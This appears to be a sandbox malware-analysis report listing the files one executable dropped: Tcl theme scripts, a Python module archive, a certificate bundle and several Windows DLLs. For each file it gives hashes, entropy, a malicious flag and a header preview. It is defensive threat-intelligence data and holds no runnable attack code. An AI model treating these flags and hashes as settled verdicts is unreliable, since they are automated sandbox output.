                                                                                                                                                                                                                              Size (bytes):2865
                                                                                                                                                                                                                              Entropy (8bit):4.917847108902527
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:b69VhW2gL5FPVWRzQsVqrEuF3yYrf7rfJF8xUqBgLt6g3ktO5jo4+iZ6O2htYtCW:bbXl+CEqZNNSxU0Ht2MR7W
                                                                                                                                                                                                                              MD5:769C0719A4044F91E7D132A25291E473
                                                                                                                                                                                                                              SHA1:6FB07B0C887D443A43FB15D5728920B578171219
                                                                                                                                                                                                                              SHA-256:AE82BCCCE708FF9C303CBCB3D4CC3FF5577A60D5B23822EA79E3E07CCE3CBBD1
                                                                                                                                                                                                                              SHA-512:47FED061DDC6B4EB63EF77901D0094FF2EBB1BAFACB3F44FBF13FB59DEA1EC83985B2862086ECF1A7957819A88A0FAA144B35F16BEA9356BBD9775070D42E636
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Settings for 'winnative' theme...#....namespace eval ttk::theme::winnative {.. ttk::style theme settings winnative {.....ttk::style configure "." \... -background SystemButtonFace \... -foreground SystemWindowText \... -selectforeground SystemHighlightText \... -selectbackground SystemHighlight \... -fieldbackground SystemWindow \... -insertcolor SystemWindowText \... -troughcolor SystemScrollbar \... -font TkDefaultFont \... ;.....ttk::style map "." -foreground [list disabled SystemGrayText] ;.. ttk::style map "." -embossed [list disabled 1] ;.....ttk::style configure TButton \... -anchor center -width -11 -relief raised -shiftrelief 1...ttk::style configure TCheckbutton -padding "2 4"...ttk::style configure TRadiobutton -padding "2 4"...ttk::style configure TMenubutton \... -padding "8 4" -arrowsize 3 -relief raised.....ttk::style map TButton -relief {{!disabled pressed} sunken}.....ttk::style configure TEntry \... -padding 2 -select
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2103
                                                                                                                                                                                                                              Entropy (8bit):4.9805308941424355
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:aaiIu89VhW2gLRWJyO514rf+rfzxTrf/MW+iZ6O2htYtCp:XoXAk21nxQ7p
                                                                                                                                                                                                                              MD5:162F30D2716438C75EA16B57E6F63088
                                                                                                                                                                                                                              SHA1:3F626FF0496BB16B27106BED7E38D1C72D1E3E27
                                                                                                                                                                                                                              SHA-256:AEDB21C6B2909A4BB4686837D2126E521A8CC2B38414A4540387B801EBD75466
                                                                                                                                                                                                                              SHA-512:6EBF9648F1381D04F351BB469B6E3A38F3D002189C92EAF80A18D65632037FF37D34EC8814BBF7FAE34553645BFC13985212F24684EE8C4E205729B975C88C97
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Settings for 'xpnative' theme..#....namespace eval ttk::theme::xpnative {.... ttk::style theme settings xpnative {.....ttk::style configure . \... -background SystemButtonFace \... -foreground SystemWindowText \... -selectforeground SystemHighlightText \... -selectbackground SystemHighlight \... -insertcolor SystemWindowText \... -font TkDefaultFont \... ;.....ttk::style map "." \... -foreground [list disabled SystemGrayText] \... ;.....ttk::style configure TButton -anchor center -padding {1 1} -width -11...ttk::style configure TRadiobutton -padding 2...ttk::style configure TCheckbutton -padding 2...ttk::style configure TMenubutton -padding {8 4}.....ttk::style configure TNotebook -tabmargins {2 2 2 0}...ttk::style map TNotebook.Tab \... -expand [list selected {2 2 2 2}].....ttk::style configure TLabelframe.Label -foreground "#0046d5".....# OR: -padding {3 3 3 6}, which some apps seem to use....ttk::style configure TEntry -padding {2 2 2 4}...ttk::
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10521
                                                                                                                                                                                                                              Entropy (8bit):5.0647027375963996
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:1Y3uWEXm/swEePmJhRAXd1hTHsHG2ML/9Lm2daM0Hu:8hodMiM0Hu
                                                                                                                                                                                                                              MD5:508F7E258C04970FAE526990168CB773
                                                                                                                                                                                                                              SHA1:33785204B18C0E0F5CDCB5B49399B5907351FDB8
                                                                                                                                                                                                                              SHA-256:B463B366F139DDF7FED31F34C6D2341F9F27845A1A358011DFC801E1333B1828
                                                                                                                                                                                                                              SHA-512:A12985B58DD1D46297119CED47B7F44EF4139CED6C36FD028E66DD657E5ED0663B744C679A5BF7A39B39D17A32E1280D2945F6B9AD59AEF20436F68040F6070C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# unsupported.tcl --..#..# Commands provided by Tk without official support. Use them at your..# own risk. They may change or go away without notice...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....# ----------------------------------------------------------------------..# Unsupported compatibility interface for folks accessing Tk's private..# commands and variable against recommended usage...# ----------------------------------------------------------------------....namespace eval ::tk::unsupported {.... # Map from the old global names of Tk private commands to their.. # new namespace-encapsulated names..... variable PrivateCommands.. array set PrivateCommands {...tkButtonAutoInvoke..::tk::ButtonAutoInvoke...tkButtonDown...::tk::ButtonDown...tkButtonEnter...::tk::ButtonEnter...tkButtonInvoke...::tk::ButtonInvoke...tkButtonLeave...::tk::ButtonLeave...tkButtonUp...::tk::ButtonUp...tk
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):26991
                                                                                                                                                                                                                              Entropy (8bit):4.974180990171971
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:0BLzjXhss64XKNFXm39QJ63nwFiHLgRIdNPCRE5phLtffsNP4XWdxWk+I5oP9jNR:0BvjXoFCB3flLCRE5phLCP3xWq8vWTod
                                                                                                                                                                                                                              MD5:FA99EF44FAA88A6BA1967A1257DEB97B
                                                                                                                                                                                                                              SHA1:CC99DBF678F4169A90ACC5A89C6F8DAB48052EC6
                                                                                                                                                                                                                              SHA-256:C4722EADEDE763FA52E7937D40067B0F8EB86B7A4B707F90212ED3E5289690D0
                                                                                                                                                                                                                              SHA-512:3AF16095784908A444CD61EEF178A30B9FED9C20AA91D94044A3AECB6047267FB80BCE790FC1F28FB19AEF664A6618FD832612F541FDADCC34B6C01E92E5EA40
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# xmfbox.tcl --..#..#.Implements the "Motif" style file selection dialog for the..#.Unix platform. This implementation is used only if the..#."::tk_strictMotif" flag is set...#..# Copyright (c) 1996 Sun Microsystems, Inc...# Copyright (c) 1998-2000 Scriptics Corporation..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....namespace eval ::tk::dialog {}..namespace eval ::tk::dialog::file {}......# ::tk::MotifFDialog --..#..#.Implements a file dialog similar to the standard Motif file..#.selection box...#..# Arguments:..#.type.."open" or "save"..#.args..Options parsed by the procedure...#..# Results:..#.When -multiple is set to 0, this returns the absolute pathname..#.of the selected file. (NOTE: This is not the same as a single..#.element list.)..#..#.When -multiple is set to > 0, this returns a Tcl list of absolute..# pathnames. The argument for -multiple is ignored, but for consistency..#
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):66328
                                                                                                                                                                                                                              Entropy (8bit):6.295486583134031
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:dGpS27sIvGJdk7YeY7S81CpnHcKWlI1OSs7Sy+xe:gpVp7xKSppnHcFlI1OSsz
                                                                                                                                                                                                                              MD5:E38A6B96F5CC200F21DA22D49E321DA3
                                                                                                                                                                                                                              SHA1:4EA69D2B021277AB0B473CFD44E4BFD17E3BAC3B
                                                                                                                                                                                                                              SHA-256:F0EBDF2CA7B33C26B8938EFA59678068D3840957EE79D2B3C576437F8F913F20
                                                                                                                                                                                                                              SHA-512:3DF55CDD44EA4789FB2DE9672F421B7FF9AD798917417DCB5B1D8575804306FB7636D436965598085D2E87256ECB476ED69DF7AF05986F05B9F4A18EED9629E2
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s............jQ...................................j....Ni.....................=..........Rich...........PE..d......f.........." ...(.n...j............................................................`.............................................P.............................../......0......T...............................@............................................text....l.......n.................. ..`.rdata...B.......D...r..............@..@.data... ...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..0...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):37656
                                                                                                                                                                                                                              Entropy (8bit):6.341257574556273
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:r/mqQhTcYsjNxO0tI1Ci75YiSyvNhAMxkE9x2:Dm7GFNxO0tI1CiF7SynxRI
                                                                                                                                                                                                                              MD5:BED7B0CED98FA065A9B8FE62E328713F
                                                                                                                                                                                                                              SHA1:E329EBCA2DF8889B78CE666E3FB909B4690D2DAA
                                                                                                                                                                                                                              SHA-256:5818679010BB536A3D463EEEE8CE203E880A8CD1C06BF1CB6C416AB0DC024D94
                                                                                                                                                                                                                              SHA-512:C95F7BB6CA9AFBA50BF0727E971DFF7326CE0E23A4BFA44D62F2ED67ED5FEDE1B018519DBFA0ED3091D485ED0ACE68B52DD0BB2921C9C1E3BC1FA875CD3D2366
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k.L...L...L...E..J.......H.......H.......D...Y...N.......Q.......K...L...........M...Y...M...Y...M...Y...M...Y...M...RichL...........PE..d....f.........." ...(.*...<.......(..............................................@.....`..........................................V..H...HV..................x....d.../......t...dG..T............................C..@............@.......S..@....................text...n(.......*.................. ..`.rdata..4 ...@..."..................@..@.data........p.......P..............@....pdata..x............T..............@..@.rsrc................X..............@..@.reloc..t............b..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1332769
                                                                                                                                                                                                                              Entropy (8bit):5.5865428536147945
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:VHlJGUqQlLmgBvc+fYNXPh26UZWAzGX7j7YQqPQCxi2hdmSPwHg1d6R1RbtRwvn:VHlJGUDa+zG/7UlZhdmSPyaQHtRwvn
                                                                                                                                                                                                                              MD5:763D1A751C5D47212FBF0CAEA63F46F5
                                                                                                                                                                                                                              SHA1:845EAA1046A47B5CF376B3DBEFCF7497AF25F180
                                                                                                                                                                                                                              SHA-256:378A4B40F4FA4A8229C93E0AFEE819085251AF03402CCEFA3B469651E50E60B7
                                                                                                                                                                                                                              SHA-512:BB356DD610E6035F4002671440CE96624ADDF9A89FD952A6419647A528A551A6CCD0ECA0EE2EEB080D9AAD683B5AFC9415C721FA62C3BCDDCB7F1923F59D9C45
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:PK..........!./gJ.O...O......._collections_abc.pyc......................................Z.....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.............Z...e.d.........Z.d...Z...e.e.........Z.[.g.d...Z.d.Z...e...e.d.................Z...e...e...e.........................Z...e...e.i.j%..........................................Z...e...e.i.j)..........................................Z...e...e.i.j-..........................................Z...e...e.g.................Z...e...e...e.g.........................Z...e...e...e.d.........................Z...e...e...e.d.d.z...........................Z...e...e...e.........................Z...e...e.d.................Z ..e...e.d.................Z!..e...e...e"........................Z#..e.i.j%..................................Z$..e.i.j)..................................Z%..e.i.j-..................................Z&..e.e.jN..........................Z(..e...d...................Z)d...Z*..e*........Z*..e.e*........Z+e*jY............................[*d...Z-..e-........
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):299427
                                                                                                                                                                                                                              Entropy (8bit):6.047872935262006
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/QRSRqNb7d8iu5Nahx:QWb/TRJLWURrI5RWavdF08/
                                                                                                                                                                                                                              MD5:50EA156B773E8803F6C1FE712F746CBA
                                                                                                                                                                                                                              SHA1:2C68212E96605210EDDF740291862BDF59398AEF
                                                                                                                                                                                                                              SHA-256:94EDEB66E91774FCAE93A05650914E29096259A5C7E871A1F65D461AB5201B47
                                                                                                                                                                                                                              SHA-512:01ED2E7177A99E6CB3FBEF815321B6FA036AD14A3F93499F2CB5B0DAE5B713FD2E6955AA05F6BDA11D80E9E0275040005E5B7D616959B28EFC62ABB43A3238F0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10752
                                                                                                                                                                                                                              Entropy (8bit):4.674392865869017
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:KGUmje72HzA5iJGhU2Y0hQMsQJCUCLsZEA4elh3XQMtCFXiHBpv9cX6gTim1qeSC:rjQ2HzzU2bRYoe1HH9cqgTimoe
                                                                                                                                                                                                                              MD5:D9E0217A89D9B9D1D778F7E197E0C191
                                                                                                                                                                                                                              SHA1:EC692661FCC0B89E0C3BDE1773A6168D285B4F0D
                                                                                                                                                                                                                              SHA-256:ECF12E2C0A00C0ED4E2343EA956D78EED55E5A36BA49773633B2DFE7B04335C0
                                                                                                                                                                                                                              SHA-512:3B788AC88C1F2D682C1721C61D223A529697C7E43280686B914467B3B39E7D6DEBAFF4C0E2F42E9DDDB28B522F37CB5A3011E91C66D911609C63509F9228133D
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..............................M....................................... ...?.......?.......?.a.....?.......Rich............................PE..d....jAe.........." ...%.....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):122880
                                                                                                                                                                                                                              Entropy (8bit):5.917175475547778
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:bA3W6Fck6/g5DzNa4cMy/dzpd1dhdMdJGFEr6/vD:MW6NzcMy/d13FErgvD
                                                                                                                                                                                                                              MD5:BF9A9DA1CF3C98346002648C3EAE6DCF
                                                                                                                                                                                                                              SHA1:DB16C09FDC1722631A7A9C465BFE173D94EB5D8B
                                                                                                                                                                                                                              SHA-256:4107B1D6F11D842074A9F21323290BBE97E8EED4AA778FBC348EE09CC4FA4637
                                                                                                                                                                                                                              SHA-512:7371407D12E632FC8FB031393838D36E6A1FE1E978CED36FF750D84E183CDE6DD20F75074F4597742C9F8D6F87AF12794C589D596A81B920C6C62EE2BA2E5654
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..r...r...r......r...s...r...s...r...w...r...v..r...q...r.#.s...r...s...r..8z...r..8r...r..8....r..8p...r.Rich..r.........................PE..d....jAe.........." ...%.:...........<.......................................0............`.........................................@...d.......................(............ ......P...................................@............P...............................text....8.......:.................. ..`.rdata...W...P...X...>..............@..@.data...8=.......0..................@....pdata..(...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5191960
                                                                                                                                                                                                                              Entropy (8bit):5.962142634441191
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:98304:n3+pefu6fSar+SJ8aqfPomg1CPwDvt3uFlDCE:3G+u6fb+SJ8aqfwmg1CPwDvt3uFlDCE
                                                                                                                                                                                                                              MD5:E547CF6D296A88F5B1C352C116DF7C0C
                                                                                                                                                                                                                              SHA1:CAFA14E0367F7C13AD140FD556F10F320A039783
                                                                                                                                                                                                                              SHA-256:05FE080EAB7FC535C51E10C1BD76A2F3E6217F9C91A25034774588881C3F99DE
                                                                                                                                                                                                                              SHA-512:9F42EDF04C7AF350A00FA4FDF92B8E2E6F47AB9D2D41491985B20CD0ADDE4F694253399F6A88F4BDD765C4F49792F25FB01E84EC03FD5D0BE8BB61773D77D74D
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...m..l...i..l...h..l...o..l..m.y.l...m...l...o..l...h.l...l..l......l...n..l.Rich.l.........PE..d......e.........." ...%..7..4......v.........................................O.......P...`.........................................P.H.0....kN.@.....N.|.....K.d.....O../....N....P.C.8.............................C.@............`N..............................text.....7.......7................. ..`.rdata....... 7.......7.............@..@.data....n....K..<....J.............@....pdata..0.....K......4K.............@..@.idata...%...`N..&....N.............@..@.00cfg..u.....N.......N.............@..@.rsrc...|.....N......0N.............@..@.reloc........N......8N.............@..B................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):39696
                                                                                                                                                                                                                              Entropy (8bit):6.641880464695502
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                                                                                                              MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                                                                                                              SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                                                                                                              SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                                                                                                              SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):787224
                                                                                                                                                                                                                              Entropy (8bit):5.609561366841894
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:ytPc2nnGoNg4kSHoxX09yO5EavUFe9Xb12:y9jnnpTHoxXUsFe9XbM
                                                                                                                                                                                                                              MD5:19A2ABA25456181D5FB572D88AC0E73E
                                                                                                                                                                                                                              SHA1:656CA8CDFC9C3A6379536E2027E93408851483DB
                                                                                                                                                                                                                              SHA-256:2E9FBCD8F7FDC13A5179533239811456554F2B3AA2FB10E1B17BE0DF81C79006
                                                                                                                                                                                                                              SHA-512:DF17DC8A882363A6C5A1B78BA3CF448437D1118CCC4A6275CC7681551B13C1A4E0F94E30FFB94C3530B688B62BFF1C03E57C2C185A7DF2BF3E5737A06E114337
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>:V.PiV.PiV.Pi_..iX.PiC.QhT.Pi..QhT.PiC.UhZ.PiC.Th^.PiC.ShR.PillQhU.PiV.QiH.PillThf.PillPhW.Pill.iW.PillRhW.PiRichV.Pi................PE..d......e.........." ...%.*..........K........................................ ............`..........................................g...Q..............s.......@M......./......`.......8...........................`...@............p...............................text...D).......*.................. ..`.rdata..Hy...@...z..................@..@.data....N.......H..................@....pdata...V.......X..................@..@.idata...c...p...d...H..............@..@.00cfg..u...........................@..@.rsrc...s...........................@..@.reloc..4...........................@..B........................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):20269568
                                                                                                                                                                                                                              Entropy (8bit):6.26223001093884
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:196608:YkRyLOBd+wrOzPW0K+VT2XZgBdeYzPXCt6eRe:YOOzPWy8kd7Xa6I
                                                                                                                                                                                                                              MD5:DA1EA9BEB18A0598191B523CBB725056
                                                                                                                                                                                                                              SHA1:1C0BB78A52723FEA8804BB4F5C4103622BCE6C3D
                                                                                                                                                                                                                              SHA-256:7A62620B556F4A485CA273E34F0E224F345DA4530D15029C74BA6EA5DE878934
                                                                                                                                                                                                                              SHA-512:B12C7EAEC2A83878503814C511EC66E0B864D92E3A75AE171025136DE4329586B89E8C1840987AE30332A2EA216819A22083A29C4730A4CD4AA99247AB817EFA
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...$..+..F5..$..P........................................5......U5...`... .......................................1.DO...`5.d.............0..#............5.l............................e0.(...................lf5.@............................text.....+.......+.................`.``.data........0+......"+.............@.`..rdata........+.......+.............@.p@.pdata...#....0..$...d0.............@.0@.xdata..,"....0..$....0.............@.0@.bss.... "....0.......................`..edata..DO....1..P....0.............@.0@.idata..d....`5.......4.............@.0..CRT....`.....5.......5.............@.@..tls..........5.......5.............@.@..reloc..l.....5..0....5.............@.0B........................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):618728
                                                                                                                                                                                                                              Entropy (8bit):6.330906923348709
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:2O93oUW7jh6DN0RUhsduQjqDZ6X/t5mTOKGmJ7DseBiltBMQEKZm+jWodEEVoFn:l3oUW7jh6DN0RUhsduQjqDZ6X/t5mTOq
                                                                                                                                                                                                                              MD5:C7CA543046C55D16B322158F6B1C2FF5
                                                                                                                                                                                                                              SHA1:E7E8F91597F33E84515E70DFD06E598D579979F7
                                                                                                                                                                                                                              SHA-256:32E6C8100BD62E7A91F50996C2A59692DC796B6F140A2DFA4DE313CA43D4C748
                                                                                                                                                                                                                              SHA-512:B0EB94D3E98780E22FBBE4598632A0BF66BCDFCA0657E350B71426845C81F26AB7DF97EDD75CBA985C4A3E5C0B68B2EEDF75BE5487DF9BBA76080E78B5AFBD66
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`..r$..!$..!$..!.O.!&..!-.|!2..!v.. '..!$..!...!v.. '..!v.. o..!v.. j..!v.. %..!v..!%..!v.. %..!Rich$..!................PE..d.....0].........." .........`...... ..............................................."a....`A............................................h....................0..t@...T..................8............................................ ..........@....................text...<........................... ..`.rdata..<.... ......................@..@.data....;..........................@....pdata..t@...0...B..................@..@.didat..h............B..............@....rsrc................D..............@..@.reloc...............H..............@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):64000
                                                                                                                                                                                                                              Entropy (8bit):6.016878537565002
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:ew4kFSHCu11F3uHi3I8LsXqpy55XrwtvnEPGFLfj9LiGvhkuWKDPO:X4F13uHQL5y8tvEPGF3w0TWYPO
                                                                                                                                                                                                                              MD5:7A2B248D6EB689EF965CB8D30A50E49E
                                                                                                                                                                                                                              SHA1:AD9676DB0B9B470A41ABCFF7DA38D23533D5B0DE
                                                                                                                                                                                                                              SHA-256:1B9F07823F627B9C1B53D05F55F8C187D4B3F805C84D5F4E0B6D8BCE78A59066
                                                                                                                                                                                                                              SHA-512:FF85B1B356476C932AD469164D8503181E199A282D6B33F54781B553DC2AA1571757F02758965539997E45DBC41CA9A67EF58B65D37605D5BE6A712156025A28
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
